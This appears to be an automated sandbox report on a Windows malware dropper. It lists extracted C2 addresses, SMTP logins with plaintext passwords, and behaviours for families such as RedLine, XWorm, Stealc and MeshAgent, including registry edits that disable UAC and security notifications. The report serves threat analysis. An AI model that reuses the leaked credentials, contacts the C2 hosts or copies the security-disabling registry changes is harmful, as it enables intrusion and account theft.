Resubmissions
04-12-2024 19:44
241204-yftswatlcj 1028-11-2024 19:40
241128-ydqnfaxqgy 1020-11-2024 16:31
241120-t1tw6azjfy 1020-11-2024 06:05
241120-gtdv5ssnes 1020-11-2024 06:00
241120-gqchxascje 1020-11-2024 05:52
241120-gk2kvaxkgn 1018-11-2024 21:54
241118-1sd93a1lfr 1017-11-2024 11:03
241117-m55qwsyemr 316-11-2024 19:06
241116-xsbmdssbkd 1016-11-2024 18:38
241116-w913ya1jcy 10Analysis
-
max time kernel
1200s -
max time network
1203s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
20-11-2024 06:00
Static task
static1
Behavioral task
behavioral1
Sample
4363463463464363463463463.exe
Resource
win11-20241007-en
General
-
Target
4363463463464363463463463.exe
-
Size
10KB
-
MD5
2a94f3960c58c6e70826495f76d00b85
-
SHA1
e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
-
SHA256
2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
-
SHA512
fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
-
SSDEEP
192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K
Malware Config
Extracted
Protocol: smtp- Host:
bham.ac.uk - Port:
587 - Username:
[email protected]
Extracted
Protocol: smtp- Host:
cuda.infonext.com.mx - Port:
587 - Username:
[email protected] - Password:
ItEnAn260617
Extracted
Protocol: smtp- Host:
smtp.juno.com - Port:
587 - Username:
[email protected] - Password:
butthou12
Extracted
Protocol: smtp- Host:
mail.petrolimex.com.vn - Port:
587 - Username:
[email protected]
Extracted
Protocol: smtp- Host:
securesmtp.trash-mail.com - Port:
587 - Username:
[email protected]
Extracted
Protocol: smtp- Host:
smtp.juno.com - Port:
587 - Username:
[email protected] - Password:
7Ladybug!
Extracted
xworm
5.0
enter-sierra.gl.at.ply.gg:55389
lzS6Ul7Mo5UcN6CR
-
Install_directory
%AppData%
-
install_file
Wave.exe
Extracted
stealc
default
http://185.215.113.17
http://91.202.233.158
-
url_path
/2fb6c2cc8dce150a.php
Extracted
meshagent
2
group
http://94.131.119.184:443/agent.ashx
-
mesh_id
0x1BB80B7BD3F37219BF6F79BEE0A08A00B90168972309CA4BFD812814A9F980439E71B51CC08CC59D904B5AED18647DD0
-
server_id
B13800B3094163CC81EA68335E6D9A9B98350B3D697F92D49A06C6ADC9519150B766816EBC90ED105D4749F3F47F60B6
-
wss
wss://94.131.119.184:443/agent.ashx
Extracted
phorphiex
http://185.215.113.66
-
mutex
Klipux
Extracted
redline
TG CLOUD @RLREBORN Admin @FATHEROFCARDERS
89.105.223.196:29862
Extracted
redline
30072024
185.215.113.67:40960
Extracted
berbew
http://f/wcmd.htm
http://f/ppslog.php
http://f/piplog.php?%s:%i:%i:%s:%09u:%i:%02d:%02d:%02d
Signatures
-
Berbew family
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Dcrat family
-
Detect Vidar Stealer 1 IoCs
resource yara_rule behavioral1/files/0x000d00000002b9f1-34973.dat family_vidar_v7 -
Detect Xworm Payload 4 IoCs
resource yara_rule behavioral1/files/0x001b00000002aae3-8.dat family_xworm behavioral1/memory/32-16-0x00000000006A0000-0x00000000006E2000-memory.dmp family_xworm behavioral1/files/0x001a00000002afec-25127.dat family_xworm behavioral1/files/0x000d00000002b9e5-34294.dat family_xworm -
Detects MeshAgent payload 1 IoCs
resource yara_rule behavioral1/files/0x0004000000025b8b-3092.dat family_meshagent -
Emotet family
-
Meshagent family
-
Modifies security service 2 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4" sysppvrdnvs.exe -
Njrat family
-
Phorphiex family
-
Phorphiex payload 6 IoCs
resource yara_rule behavioral1/files/0x001d00000002aafc-3040.dat family_phorphiex behavioral1/files/0x000400000000f406-5498.dat family_phorphiex behavioral1/files/0x001a00000002ab36-11291.dat family_phorphiex behavioral1/files/0x001900000002ad9d-20382.dat family_phorphiex behavioral1/files/0x001b00000002b00d-25031.dat family_phorphiex behavioral1/files/0x000f00000002b9b7-33507.dat family_phorphiex -
Process spawned unexpected child process 42 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 55888 3672 Process not Found 133 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 55144 3672 Process not Found 133 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 56332 3672 Process not Found 133 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 56420 3672 Process not Found 133 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 56504 3672 Process not Found 133 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 56552 3672 Process not Found 133 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 56580 3672 Process not Found 133 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 56636 3672 Process not Found 133 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 56792 3672 Process not Found 133 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 56844 3672 Process not Found 133 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 56880 3672 Process not Found 133 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 56716 3672 Process not Found 133 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 56964 3672 Process not Found 133 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 57024 3672 Process not Found 133 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 57104 3672 Process not Found 133 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 57160 3672 Process not Found 133 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 57240 3672 Process not Found 133 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 57296 3672 Process not Found 133 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 56344 3672 Process not Found 133 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 55888 3672 Process not Found 133 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 40084 3672 Process not Found 133 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 57364 3672 Process not Found 133 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 58444 3672 Process not Found 133 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 59248 3672 Process not Found 133 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 59268 3672 Process not Found 133 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 58972 3672 Process not Found 133 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 56672 3672 Process not Found 133 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 57556 3672 Process not Found 133 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 56864 3672 Process not Found 133 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 58176 3672 Process not Found 133 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 58248 3672 Process not Found 133 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 57824 3672 Process not Found 133 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 54252 3672 Process not Found 133 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 55444 3672 Process not Found 133 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 59336 3672 Process not Found 133 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 59280 3672 Process not Found 133 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 55512 3672 Process not Found 133 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 58240 3672 Process not Found 133 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 53664 3672 Process not Found 133 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 58792 3672 Process not Found 133 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 54872 3672 Process not Found 133 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4464 3672 Process not Found 133 -
Quasar family
-
Quasar payload 4 IoCs
resource yara_rule behavioral1/files/0x001900000002ad83-20190.dat family_quasar behavioral1/files/0x001b00000002aff4-25021.dat family_quasar behavioral1/files/0x000d00000002b8de-31724.dat family_quasar behavioral1/files/0x000d00000002b945-32466.dat family_quasar -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 10 IoCs
resource yara_rule behavioral1/memory/2644-5493-0x0000000000400000-0x0000000000452000-memory.dmp family_redline behavioral1/files/0x001a00000002ab60-15241.dat family_redline behavioral1/memory/17868-15278-0x0000000000E80000-0x0000000000ED2000-memory.dmp family_redline behavioral1/files/0x001900000002b023-25115.dat family_redline behavioral1/files/0x001900000002b031-26358.dat family_redline behavioral1/files/0x001100000002b505-29656.dat family_redline behavioral1/files/0x000d00000002b77f-30883.dat family_redline behavioral1/files/0x0004000000025b75-32792.dat family_redline behavioral1/files/0x0003000000025d94-33001.dat family_redline behavioral1/files/0x000d00000002b9b4-33468.dat family_redline -
Redline family
-
SectopRAT payload 1 IoCs
resource yara_rule behavioral1/files/0x001900000002b023-25115.dat family_sectoprat -
Sectoprat family
-
Sliver RAT v2 1 IoCs
resource yara_rule behavioral1/files/0x001a00000002b038-26465.dat SliverRAT_v2 -
Sliver family
-
Stealc family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target PID 5376 created 3216 5376 2014831613.exe 53 PID 5376 created 3216 5376 2014831613.exe 53 -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" reg.exe -
Vidar family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" sysppvrdnvs.exe -
XMRig Miner payload 2 IoCs
resource yara_rule behavioral1/files/0x001900000002b053-26824.dat family_xmrig behavioral1/files/0x001900000002b053-26824.dat xmrig -
Xmrig family
-
Xworm family
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
resource yara_rule behavioral1/files/0x001500000002b9b5-33761.dat dcrat behavioral1/files/0x000e00000002b9cb-33804.dat dcrat -
resource yara_rule behavioral1/files/0x000d00000002b9bc-33586.dat emotet -
pid Process 4432 powershell.exe 38780 Process not Found 892 powershell.exe 2428 powershell.exe 1736 powershell.exe 8788 Process not Found 49568 Process not Found 4636 powershell.exe 3380 powershell.exe 3532 powershell.exe 6064 powershell.exe 10452 powershell.exe 24444 powershell.exe 6200 Process not Found 9412 Process not Found 37192 Process not Found 38780 Process not Found 52900 Process not Found -
Contacts a large (1490) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Downloads MZ/PE file
-
Indicator Removal: Network Share Connection Removal 1 TTPs 1 IoCs
Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.
pid Process 28732 Process not Found -
Modifies Windows Firewall 2 TTPs 4 IoCs
pid Process 4812 netsh.exe 72 netsh.exe 5596 netsh.exe 1320 netsh.exe -
Sets file to hidden 1 TTPs 2 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 2652 attrib.exe 40700 Process not Found -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Mesh Agent\ImagePath = "\"C:\\Program Files (x86)\\Mesh Agent\\MeshAgent.exe\" " meshagent32-group.exe -
Drops startup file 4 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\603620ea0fe398ac1d9cd08d637e8563.exe Runtime Broker.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\603620ea0fe398ac1d9cd08d637e8563.exe Runtime Broker.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Wave.lnk XClient.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Wave.lnk XClient.exe -
Executes dropped EXE 41 IoCs
pid Process 32 XClient.exe 2752 3544436.exe 2244 NOTallowedtocrypt.exe 2220 76y5trfed675ytg.exe 3152 GoodFrag.exe 1468 Runtime Broker.exe 2820 m.exe 3920 c2.exe 4088 j4vzzuai.exe 948 sysvplervcs.exe 456 stealc_default.exe 5008 j4vzzuai.exe 2220 Installeraus.exe 1952 meshagent32-group.exe 2788 MeshAgent.exe 4820 Wave.exe 2380 Cbmefxrmnv.exe 3904 r.exe 2484 wwbizsrvs.exe 5404 Cbmefxrmnv.exe 5576 2232519369.exe 5800 Wave.exe 5820 hwbpwd.exe 5788 685410430.exe 5644 av_downloader.exe 5968 AV_DOW~1.EXE 3864 wow.exe 4636 svchost.exe 1576 247805573.exe 1824 3132929399.exe 2512 kmvcsaed.exe 1260 OGFN%20Updater.exe 3920 crypted.exe 5268 tdrpload.exe 2072 sysppvrdnvs.exe 5376 2014831613.exe 5928 needmoney.exe 1072 hwbpwd.exe 2844 winupsecvmgr.exe 4116 svchost015.exe 4136 loader.exe -
Loads dropped DLL 5 IoCs
pid Process 2752 3544436.exe 456 stealc_default.exe 456 stealc_default.exe 3864 wow.exe 3864 wow.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/files/0x001900000002ae43-22824.dat themida behavioral1/files/0x001000000002b91f-32633.dat themida behavioral1/files/0x0002000000025c53-32871.dat themida -
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
resource yara_rule behavioral1/files/0x0003000000000689-5443.dat vmprotect behavioral1/memory/4636-5448-0x00007FF7E7650000-0x00007FF7E7885000-memory.dmp vmprotect behavioral1/memory/4636-5451-0x00007FF7E7650000-0x00007FF7E7885000-memory.dmp vmprotect behavioral1/files/0x000700000002a67d-33455.dat vmprotect -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" sysppvrdnvs.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 12 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000\Software\Microsoft\Windows\CurrentVersion\Run\6754ytr756ytr7654yretg8765uyt = "\"C:\\Users\\Admin\\AppData\\Roaming\\kjhgfdc\\76y5trfed675ytg.exe\"" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000\Software\Microsoft\Windows\CurrentVersion\Run\603620ea0fe398ac1d9cd08d637e8563 = "\"C:\\Users\\Admin\\AppData\\Roaming\\Runtime Broker.exe\" .." Runtime Broker.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysvplervcs.exe" m.exe Set value (str) \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000\Software\Microsoft\Windows\CurrentVersion\Run\VolumeInfo = "C:\\Users\\Admin\\AppData\\Roaming\\VolumeInfo.exe" Cbmefxrmnv.exe Set value (str) \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000\Software\Microsoft\Windows\CurrentVersion\Run\Wave = "C:\\Users\\Admin\\AppData\\Roaming\\Wave.exe" XClient.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\6754ytr756ytr7654yretg8765uyt = "\"C:\\Users\\Admin\\AppData\\Roaming\\kjhgfdc\\76y5trfed675ytg.exe\"" 76y5trfed675ytg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000\Software\Microsoft\Windows\CurrentVersion\Run\6754ytr756ytr7654yretg8765uyt = "\"C:\\Users\\Admin\\AppData\\Roaming\\kjhgfdc\\76y5trfed675ytg.exe\"" 76y5trfed675ytg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\6754ytr756ytr7654yretg8765uyt = "\"C:\\Users\\Admin\\AppData\\Roaming\\kjhgfdc\\76y5trfed675ytg.exe\"" iexplore.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\603620ea0fe398ac1d9cd08d637e8563 = "\"C:\\Users\\Admin\\AppData\\Roaming\\Runtime Broker.exe\" .." Runtime Broker.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysppvrdnvs.exe" tdrpload.exe Set value (str) \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000\Software\Microsoft\Windows\CurrentVersion\Run\6754ytr756ytr7654yretg8765uyt = "\"C:\\Users\\Admin\\AppData\\Roaming\\kjhgfdc\\76y5trfed675ytg.exe\"" NOTallowedtocrypt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\6754ytr756ytr7654yretg8765uyt = "\"C:\\Users\\Admin\\AppData\\Roaming\\kjhgfdc\\76y5trfed675ytg.exe\"" NOTallowedtocrypt.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\Videos\Captures\desktop.ini svchost.exe -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\e: cmd.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 20 IoCs
flow ioc 3131 yandex.com 6655 raw.githubusercontent.com 15326 raw.githubusercontent.com 1 raw.githubusercontent.com 88 raw.githubusercontent.com 129 raw.githubusercontent.com 4400 raw.githubusercontent.com 10155 raw.githubusercontent.com 4 raw.githubusercontent.com 133 raw.githubusercontent.com 134 raw.githubusercontent.com 3131 raw.githubusercontent.com 4899 raw.githubusercontent.com 11046 yandex.com 13474 yandex.com 15419 raw.githubusercontent.com 130 raw.githubusercontent.com 135 raw.githubusercontent.com 2747 yandex.com 79 raw.githubusercontent.com -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 4886 api.ipify.org 4932 api.ipify.org 4983 ip-api.com -
pid Process 4528 GameBarPresenceWriter.exe -
Drops file in System32 directory 64 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\symbols\dll\ntasn1.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\bcryptprimitives.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\wkernel32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\sechost.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\oleaut32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\iphlpapi.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\dbghelp.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\DLL\bcrypt.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\DLL\dbgcore.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\ntasn1.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\crypt32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\ws2_32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\sechost.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\ole32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\shell32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\combase.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\comctl32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\wntdll.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\crypt32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\ws2_32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\wuser32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\ntasn1.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\shcore.pdb MeshAgent.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\4576053A75C8E1F3EF58305A622D150B328341E7 MeshAgent.exe File opened for modification C:\Windows\SysWOW64\msvcp_win.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\oleaut32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\gdiplus.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\DLL\dbgcore.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\oleaut32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\comctl32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dbgcore.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\shcore.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\wwin32u.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\wgdi32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\advapi32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\advapi32.pdb MeshAgent.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\0E846CB359894C6864CA8701C27A9697FB256856 MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\wgdi32full.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\shell32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\gdiplus.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\bcryptprimitives.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\wntdll.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\advapi32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\msvcrt.pdb MeshAgent.exe File created C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\43573B473F619378ADA4F2BD172686ED7BE061F6 MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\shell32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\ncrypt.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\DLL\iphlpapi.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\bcrypt.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\ucrtbase.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\ucrtbase.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\wrpcrt4.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\wgdi32full.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\Kernel.Appcore.pdb MeshAgent.exe File created C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\0E846CB359894C6864CA8701C27A9697FB256856 MeshAgent.exe File created C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\5B1EE8BDD6D02B5D398F42B834595FFFE1F063AD MeshAgent.exe File opened for modification C:\Windows\SysWOW64\exe\MeshService.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\apphelp.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\Kernel.Appcore.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\shcore.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\ucrtbase.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\msvcp_win.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\sechost.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\ole32.pdb MeshAgent.exe -
Enumerates processes with tasklist 1 TTPs 9 IoCs
pid Process 13484 Process not Found 29992 Process not Found 33544 Process not Found 36984 Process not Found 53976 Process not Found 15432 tasklist.exe 20224 Process not Found 9156 Process not Found 37912 Process not Found -
Suspicious use of SetThreadContext 8 IoCs
